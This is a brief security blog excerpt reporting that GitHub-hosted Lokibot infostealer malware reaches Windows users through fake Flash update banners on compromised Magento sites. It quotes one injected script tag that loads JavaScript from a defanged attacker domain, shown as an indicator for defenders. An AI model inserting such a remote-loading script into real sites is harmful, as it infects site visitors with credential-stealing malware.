GitHub Hosts Lokibot Infostealer
<p>A few months ago, we reported on how cybercriminals were using GitHub to load a variety of cryptominers on hacked websites. We have now discovered that this same approach is being used to push binary “info stealing” malware to Windows computers.</p>
Infected Magento Sites
Recently, we identified hundreds of infected Magento sites with the following injected script:
<script type="text/javascript" src="https://bit.wo[.]tc/js/lib/js.js">
The contents of the js.js file included:
This code creates a hidden div and after a short delay displays a fake Flash Player update banner above the normal site content.
Continue reading GitHub Hosts Lokibot Infostealer at Sucuri Blog.